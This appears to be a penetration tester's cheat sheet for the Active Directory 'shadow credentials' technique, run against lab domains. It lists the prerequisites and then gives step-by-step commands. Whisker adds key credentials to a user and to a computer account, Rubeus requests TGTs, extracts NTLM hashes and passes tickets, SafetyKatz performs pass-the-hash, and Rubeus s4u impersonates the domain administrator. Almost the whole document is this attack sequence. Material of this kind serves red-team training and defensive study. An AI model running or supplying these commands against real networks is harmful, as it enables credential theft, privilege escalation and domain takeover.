# shadow-credentials

## Methodology

1. User with GenericAll/GenericWrite on `msDS-KeyCredentialLink` (Key Admins and Enterprise Key Admins have it by default).
2. Enumerate if the DC is atleast Windows 2016

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

## Whisker

**Add shadow credential:**

```
Whisker.exe add /target:supportXuser
```

**Check if shadow credential is added**

```
Get-DomainUser -Identity supportXuser
```

**Request the TGT by leveraging the certificate**

```batchfile
# Retrieve NTLM hash
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap

# Pass the ticket
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap /ptt
```

**Inject the TGT in the current session or use the NTLM hash:**

```batchfile
Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...
```

#### Abusing Computer Object

**Add the Shadow Credentials.**

```
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:mgmtadmin /domain:us.techcorp.local /aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f /run:cmd.exe" "exit"
Whisker.exe add /target:us-helpdesk$
```

**Using PowerView, see if the Shadow Credential is added.**

```
Get-DomainComputer -Identity us-helpdesk
```

**Request the TGT by using the certificate.**

```
Rubeus.exe asktgt /user:us-helpdesk$ /certificate:MIIJ0AIBAzCCCYwGCSqGSIb... /password:"ViGFoZJa..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show
```

**Request and Inject the TGS by impersonating the user.**

```
Rubeus.exe s4u /dc:us-dc.us.techcorp.local /ticket:doIGkDCCBoygAwIBBaEDAgEW... /impersonateuser:administrator /ptt /self /altservice:cifs/us-helpdesk
```